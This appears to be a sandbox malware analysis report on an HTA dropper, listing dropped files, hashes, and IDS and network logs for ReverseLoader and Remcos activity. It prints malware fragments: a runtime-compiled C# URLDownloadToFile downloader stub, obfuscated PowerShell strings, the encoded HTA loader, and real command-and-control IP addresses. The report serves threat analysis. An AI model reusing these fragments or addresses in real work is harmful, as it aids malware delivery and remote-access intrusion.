                                                                                                        Preview:...... . . . .....P.t.u.O.q.o.f.e.c.d.G.k.H.L.t. .=. .".c.I.k.R.N.r.W.W.z.n.d.u.x.p.B.".....n.G.T.z.L.p.K.i.c.q.p.t.i.a.k. .=. .".G.U.K.e.W.L.p.u.e.j.c.q.l.e.K.".....e.L.e.j.L.A.W.U.k.G.B.G.W.b.L. .=. .".W.c.T.W.L.l.b.i.K.W.i.m.J.m.O.".........K.N.k.U.n.z.W.o.u.h.Q.K.C.o.W. .=. .".O.z.o.G.A.k.p.a.R.g.h.P.i.d.l.".....l.k.R.h.m.T.i.u.i.x.B.L.f.x.b. .=. .".P.L.n.G.e.k.q.a.I.n.W.f.i.L.a.".....N.c.t.U.W.s.C.b.B.L.l.m.L.J.H. .=. .".t.i.G.W.W.n.m.U.o.L.k.L.K.e.Q.".....W.i.I.K.l.n.i.K.l.j.p.A.k.G.Z. .=. .".G.i.N.k.o.B.U.x.L.c.s.W.b.L.Z.".....c.W.e.q.B.L.o.o.z.j.K.t.o.L.Q. .=. .".n.i.p.Z.i.W.j.K.L.z.m.G.W.A.v.".....W.B.o.q.i.Q.l.i.W.C.W.l.h.i.k. .=. .".O.A.G.W.K.m.Z.S.L.c.x.U.r.W.d.".....b.A.L.U.L.q.G.x.L.W.f.u.z.m.k. .=. .".l.b.m.c.W.G.A.O.Z.A.m.i.p.c.K.".....e.p.L.l.x.r.K.N.K.s.k.h.A.U.U. .=. .".L.c.K.i.K.i.i.z.J.N.a.o.C.b.S.".....l.k.L.h.a.P.O.n.K.h.u.j.f.k.h. .=. .".L.h.P.C.T.e.L.Z.m.n.k.G.u.Z.n.".....J.G.i.L.c.C.f.G.K.N.C.t.t.e.k. .=. .".W.i.i.W.z.W.b.k.B.P.b.o.G.a.c.".....P.m.L.W.f.S.k.S.
                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):5829
                                                                                                        Entropy (8bit):4.901113710259376
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:96:ZCJ2Woe5H2k6Lm5emmXIGLgyg12jDs+un/iQLEYFjDaeWJ6KGcmXlQ9smpFRLcUn:Uxoe5HVsm5emdQgkjDt4iWN3yBGHVQ9v
                                                                                                        MD5:7827E04B3ECD71FB3BD7BEEE4CA52CE8
                                                                                                        SHA1:22813AF893013D1CCCACC305523301BB90FF88D9
                                                                                                        SHA-256:5D66D4CA13B4AF3B23357EB9BC21694E7EED4485EA8D2B8C653BEF3A8E5D0601
                                                                                                        SHA-512:D5F6604E49B7B31C2D1DA5E59B676C0E0F37710F4867F232DF0AA9A1EE170B399472CA1DF0BD21DF702A1B5005921D35A8E6858432B00619E65D0648C74C096B
                                                                                                        Malicious:false
                                                                                                        Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1144
                                                                                                        Entropy (8bit):5.290848674040258
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:32gSKco4KmBs4RPT6BmFoUebIKomjKcmZ9t7J0gt/NKM9r8Hd:GgSU4y4RQmFoUeWmfmZ9tK8NF9u
                                                                                                        MD5:374272AB01A3AD6B586FC209D47F884D
                                                                                                        SHA1:8C785EB3C085C24C140A197D553DE29B3AF5628A
                                                                                                        SHA-256:FEEC1C388B6D48779BD53FDC17D19CCFBABF759B59C84DAC3DA1B6D3D1376981
                                                                                                        SHA-512:4266E69AA211B66EC5E5BF649C75D9D136B735B41FDEC089EA61919DC3E93A2FC7A4B274A313234AE813F0DA7DA16EB3236039C77A7A66DC00AFFE26990790B3
                                                                                                        Malicious:false
                                                                                                        Preview:@...e...........................................................@...............(..o...B.Rb&............Microsoft.VisualBasic...H...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Commands.Utility...
                                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                                        File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x496, 9 symbols, created Wed Dec 11 12:19:34 2024, 1st section name ".debug$S"
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1340
                                                                                                        Entropy (8bit):3.997317536876093
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:HdK9oVajaHJwKcjmfwI+ycuZhNiakS6PNnqSed:5IOSK2mo1ulia32qS+
                                                                                                        MD5:37DFE4CF50134EBD7ACF880D8A86AAF2
                                                                                                        SHA1:A46E04DD19EF8E7AA87CC7170B373A00B1BDD921
                                                                                                        SHA-256:7B787D2CAA693D3803C3BD5EE2CAD49C086D2DB1CCD9673194E8DBEAD8337455
                                                                                                        SHA-512:75461E06EB0D8AE7EA4040163FB4A53D315F7C86F4F678D44BB7C75D5A614E5FDD0526D78D70A257389F319D791D308A4DA02A4AA670CC465BCFB7EC8B72B5D4
                                                                                                        Malicious:false
                                                                                                        Preview:L...V.Yg.............debug$S........X...................@..B.rsrc$01........X.......<...........@..@.rsrc$02........P...F...............@..@........W....c:\Users\user\AppData\Local\Temp\gxlowwdn\CSC56436D359159402F8D448B12D32335C6.TMP......................."\..V.............7.......C:\Users\user\AppData\Local\Temp\RESFAE8.tmp.-.<....................a..Microsoft (R) CVTRES._.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe.................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...g.x.l.o.w.w.d.n...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....
                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):60
                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                        Malicious:false
                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):60
                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                        Malicious:false
                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):60
                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                        Malicious:false
                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):60
                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                        Malicious:false
                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):60
                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                        Malicious:false
                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):60
                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                        Malicious:false
                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                        File Type:MSVC .res
                                                                                                        Category:dropped
                                                                                                        Size (bytes):652
                                                                                                        Entropy (8bit):3.091394235349783
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5grybYak7YnqqGNPN5Dlq5J:+RI+ycuZhNiakS6PNnqX
                                                                                                        MD5:B1FC0CB499C8E0225CC1BB56D48B9A0B
                                                                                                        SHA1:AE48B7D030E748303E50E537E8D23BDD91B9EA7D
                                                                                                        SHA-256:5B715C82216DDCD51FB7FBCCD9B38EE07809EB76F0C41D8C0A4495D23961B82D
                                                                                                        SHA-512:1668CDE44D912EA3836C10E8E97E6511C721A63D3E266EE7FFCBD159AC0C3D3ABCA1B9EE40D19BD35E3B6FE380B5C814989DE50764F034DFABB68981DE6D7465
                                                                                                        Malicious:false
                                                                                                        Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...g.x.l.o.w.w.d.n...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...g.x.l.o.w.w.d.n...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        File Type:C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (369)
                                                                                                        Category:dropped
                                                                                                        Size (bytes):477
                                                                                                        Entropy (8bit):3.737854877726566
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6:V/DsYLDS81zuTqmMCDQXReKJ8SRHy4HewziGKmyb5Jvc1IiP/Qy:V/DTLDfu3kXfH68iGKv3EfP/Qy
                                                                                                        MD5:2E19302EE1FACA85EA0132E02DA90F67
                                                                                                        SHA1:4930A2AF181CE2FB012629F3EF214CB1B591F6FF
                                                                                                        SHA-256:E7EB33287B9B8BE9EE6F0E247842A9A65567E1B6A63030951A79A05B6A38F46B
                                                                                                        SHA-512:CB97722EB63AB457DF075A33FD61BA6C4CC516BDE8DAFB2E44BC762230242D0033A965CADBA64D0C06A8447512E4E56043C78CDA352BD597F395E0AB6B6E16E3
                                                                                                        Malicious:false
                                                                                                        Preview:.using System;.using System.Runtime.InteropServices;..namespace b.{. public class zvj. {. [DllImport("uRLmOn", CharSet = CharSet.Unicode)]public static extern IntPtr URLDownloadToFile(IntPtr KyQAmVJIQoG,string bj,string Qm,uint IrGdpHvSMl,IntPtr FLNzUnfLG);.. }..}.
                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (372), with no line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):375
                                                                                                        Entropy (8bit):5.207636515080916
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2N723fUzxs7+AEszIN723fT9:p37Lvkmb6K2asWZETaJ
                                                                                                        MD5:722F672218A7753D4D86B762856DAF0C
                                                                                                        SHA1:89716A767DEA9E6FF2FB56F69A8AF7BCFEACFD90
                                                                                                        SHA-256:C4D72F4722E8007D31B21B5306C12E085998A786303EE14FE205278FBAB0F81D
                                                                                                        SHA-512:9E6645FCB1C73239FA9AADBD4F3B8B5974EC0DCD501953016E236A513ACB2E7D1EFC5447FF232E1F51818B1E1A035B7F8B0DA86B079515781C3AFCEF67315B22
                                                                                                        Malicious:true
                                                                                                        Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\gxlowwdn\gxlowwdn.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\gxlowwdn\gxlowwdn.0.cs"
                                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                        Category:dropped
                                                                                                        Size (bytes):3072
                                                                                                        Entropy (8bit):2.8127885892258946
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:etGS0WPBu5exl8alzkibr8izMtkZfsDNTjcUWI+ycuZhNiakS6PNnq:60sx+alNbrzzzJsDNTA31ulia32q
                                                                                                        MD5:7FAD21224353E7DD740AFF5C39037AE4
                                                                                                        SHA1:1F5748E0AFB248F8C1FEE268EB234BA9E873FF50
                                                                                                        SHA-256:DEBF6E68141551D2BC42FC5060476DA370C07D16DACBAD8F12F7B7F9313741C9
                                                                                                        SHA-512:CB0880083E22200B44B209FF8156DEA7503542BB6F0ECC17FD58CC2C3015C5DBF16D49C4CD8EFC610116CB22F224E9E18FD3CA7108C9AFE7B40C154E54955B28
                                                                                                        Malicious:false
                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...V.Yg...........!.................#... ...@....... ....................................@.................................T#..W....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ................................................................(....*BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID.......L...#Blob...........G.........%3............................................................-.&.....s.....s.......................................... 4.....P ......F.........L.....X.....[.....^.....i...F.....F...!.F.....F.......!.....*.......4..................................................<Module>.gx
                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (455), with CRLF, CR line terminators
                                                                                                        Category:modified
                                                                                                        Size (bytes):876
                                                                                                        Entropy (8bit):5.286598688026741
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:KOuqd3ka6K2adETaMKax5DqBVKVrdFAMBJTH:yika6CdE+MK2DcVKdBJj
                                                                                                        MD5:E2CE02BD4F7B47B4B613F4FFD16B10AF
                                                                                                        SHA1:DB5BA1266A3E2B0A0F26FA423313BB0BE9B3841D
                                                                                                        SHA-256:43B84C8A35F5AA0478883E500596D5391101F77FF0BFEC10A68B3E47F213A915
                                                                                                        SHA-512:8C545209F4764299B271B74D4FED5261B3612DE6A6D6033A610F891FB353E0F16707F5A0EEB79F6C631E6C03DB3682E629C25931B2FEA1516C16377F88F8F7DB
                                                                                                        Malicious:false
                                                                                                        Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\gxlowwdn\gxlowwdn.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\gxlowwdn\gxlowwdn.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        File Type:Unicode text, UTF-16, little-endian text, with very long lines (3203), with CRLF line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):153952
                                                                                                        Entropy (8bit):3.8067197460998417
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3072:HJlofF4RJFAiJlofF4RJFNiJlofF4RJFl:HJlofeRJFAiJlofeRJFNiJlofeRJFl
                                                                                                        MD5:5CE00A79A9F41D260446BFDCC6267ADF
                                                                                                        SHA1:0B2B90BEB56C59916B98004B1444698538729822
                                                                                                        SHA-256:EFAB5D21ED82F610BC5F1734B909A7E5C3A6C2ECEBB276DD03B4D5BAF8E9B058
                                                                                                        SHA-512:D4DE7FE61F23CE7524ED3123319AC93F33AE1806BD426045CA9DF1FA9EE82CCA58AA314711BBDE6A6FFA2EEE98DC20CC5E4D80D2EC7ABB028BE0639944714FEE
                                                                                                        Malicious:true
                                                                                                        Preview:...... . . . .....P.t.u.O.q.o.f.e.c.d.G.k.H.L.t. .=. .".c.I.k.R.N.r.W.W.z.n.d.u.x.p.B.".....n.G.T.z.L.p.K.i.c.q.p.t.i.a.k. .=. .".G.U.K.e.W.L.p.u.e.j.c.q.l.e.K.".....e.L.e.j.L.A.W.U.k.G.B.G.W.b.L. .=. .".W.c.T.W.L.l.b.i.K.W.i.m.J.m.O.".........K.N.k.U.n.z.W.o.u.h.Q.K.C.o.W. .=. .".O.z.o.G.A.k.p.a.R.g.h.P.i.d.l.".....l.k.R.h.m.T.i.u.i.x.B.L.f.x.b. .=. .".P.L.n.G.e.k.q.a.I.n.W.f.i.L.a.".....N.c.t.U.W.s.C.b.B.L.l.m.L.J.H. .=. .".t.i.G.W.W.n.m.U.o.L.k.L.K.e.Q.".....W.i.I.K.l.n.i.K.l.j.p.A.k.G.Z. .=. .".G.i.N.k.o.B.U.x.L.c.s.W.b.L.Z.".....c.W.e.q.B.L.o.o.z.j.K.t.o.L.Q. .=. .".n.i.p.Z.i.W.j.K.L.z.m.G.W.A.v.".....W.B.o.q.i.Q.l.i.W.C.W.l.h.i.k. .=. .".O.A.G.W.K.m.Z.S.L.c.x.U.r.W.d.".....b.A.L.U.L.q.G.x.L.W.f.u.z.m.k. .=. .".l.b.m.c.W.G.A.O.Z.A.m.i.p.c.K.".....e.p.L.l.x.r.K.N.K.s.k.h.A.U.U. .=. .".L.c.K.i.K.i.i.z.J.N.a.o.C.b.S.".....l.k.L.h.a.P.O.n.K.h.u.j.f.k.h. .=. .".L.h.P.C.T.e.L.Z.m.n.k.G.u.Z.n.".....J.G.i.L.c.C.f.G.K.N.C.t.t.e.k. .=. .".W.i.i.W.z.W.b.k.B.P.b.o.G.a.c.".....P.m.L.W.f.S.k.S.
                                                                                                        File type:HTML document, ASCII text, with very long lines (65450), with CRLF line terminators
                                                                                                        Entropy (8bit):2.630659146917442
                                                                                                        TrID:
                                                                                                          File name:nicegirlforyou.hta
                                                                                                          File size:83'209 bytes
                                                                                                          MD5:fea592b533e97736debe379b886595a7
                                                                                                          SHA1:70eb330d0db30762edc64d262b7f1cfc24c8b540
                                                                                                          SHA256:fbda5655a80445279f376d372348b57ab9dbadae81e69df823a6949a412cbe96
                                                                                                          SHA512:da2ca1896e0d1d9f2e30e73ba1842e058fce5bfe43e4ebc8b8c3759d018abb73a330d975a6a857ea16c18bf48d73d02d2442eb8970823f42e480572773511637
                                                                                                          SSDEEP:768:t5bUZA+cT/RVeU2Dx6AyZ6LAuAHAmxLkFyYEOKuryyUSFG/w6acCEOKury/lI5Tq:t5
                                                                                                          TLSH:B7836907D54BF93CEB87A9FBE33C9B1A1386AD11ED8E450F06AC05551BD5ACBB02C894
                                                                                                          File Content Preview:<Script Language='Javascript'>.. HTML Encryption provided by kufat.com -->.. ..document.write(unescape('%3C%53%63%72%69%70%74%20%4C%61%6E%67%75%61%67%65%3D%27%4A%61%76%61%73%63%72%69%70%74%27%3E%0A%3C%21%2D%2D%20%48%54%4D%4C%20%45%6E%63%72%79%70%74
                                                                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                          2024-12-11T11:22:54.286610+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.650016192.169.69.2614645TCP
                                                                                                          2024-12-11T11:23:02.599903+01002858795ETPRO MALWARE ReverseLoader Payload Request (GET) M21192.168.2.649707172.245.142.6080TCP
                                                                                                          2024-12-11T11:23:13.327409+01002049038ET MALWARE ReverseLoader Reverse Base64 Loader In Image M21151.101.1.137443192.168.2.649710TCP
                                                                                                          2024-12-11T11:23:29.784941+01002841075ETPRO MALWARE Terse Request to paste .ee - Possible Download1192.168.2.649759104.21.84.67443TCP
                                                                                                          2024-12-11T11:23:30.189989+01002020424ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 2 M11104.21.84.67443192.168.2.649759TCP
                                                                                                          2024-12-11T11:23:30.189989+01002020425ET EXPLOIT_KIT ReverseLoader Base64 Payload Inbound M21104.21.84.67443192.168.2.649759TCP
                                                                                                          2024-12-11T11:23:31.159684+01002858295ETPRO MALWARE ReverseLoader Base64 Encoded EXE With Content-Type Mismatch (text/plain)1104.21.84.67443192.168.2.649759TCP
                                                                                                          2024-12-11T11:23:42.070450+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.649765192.169.69.2614645TCP
                                                                                                          2024-12-11T11:23:53.595653+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.649793192.169.69.2614645TCP
                                                                                                          2024-12-11T11:24:05.016800+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.649823192.169.69.2614645TCP
                                                                                                          2024-12-11T11:24:16.489153+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.649851192.169.69.2614645TCP
                                                                                                          2024-12-11T11:24:27.937721+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.649879192.169.69.2614645TCP
                                                                                                          2024-12-11T11:24:39.404581+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.649907192.169.69.2614645TCP
                                                                                                          2024-12-11T11:24:51.203478+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.649938192.169.69.2614645TCP
                                                                                                          2024-12-11T11:25:02.711340+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.649965192.169.69.2614645TCP
                                                                                                          2024-12-11T11:25:14.227525+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.649992192.169.69.2614645TCP
                                                                                                          2024-12-11T11:25:25.659401+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.650003192.169.69.2614645TCP
                                                                                                          2024-12-11T11:25:37.107534+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.650004192.169.69.2614645TCP
                                                                                                          2024-12-11T11:25:48.643825+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.650006192.169.69.2614645TCP
                                                                                                          2024-12-11T11:26:00.424029+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.650008192.169.69.2614645TCP
                                                                                                          2024-12-11T11:26:11.961120+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.650009192.169.69.2614645TCP
                                                                                                          2024-12-11T11:26:23.541405+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.650010192.169.69.2614645TCP
                                                                                                          2024-12-11T11:26:35.057421+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.650012192.169.69.2614645TCP
                                                                                                          2024-12-11T11:26:46.560481+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.650013192.169.69.2614645TCP
                                                                                                          2024-12-11T11:26:57.999070+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.650015192.169.69.2614645TCP
                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                          Dec 11, 2024 11:23:01.327030897 CET4970780192.168.2.6172.245.142.60
                                                                                                          Dec 11, 2024 11:23:01.447257996 CET8049707172.245.142.60192.168.2.6
                                                                                                          Dec 11, 2024 11:23:01.449284077 CET4970780192.168.2.6172.245.142.60
                                                                                                          Dec 11, 2024 11:23:01.459352016 CET4970780192.168.2.6172.245.142.60
                                                                                                          Dec 11, 2024 11:23:01.578768015 CET8049707172.245.142.60192.168.2.6
                                                                                                          Dec 11, 2024 11:23:02.599783897 CET8049707172.245.142.60192.168.2.6
                                                                                                          Dec 11, 2024 11:23:02.599812031 CET8049707172.245.142.60192.168.2.6
                                                                                                          Dec 11, 2024 11:23:02.599828959 CET8049707172.245.142.60192.168.2.6
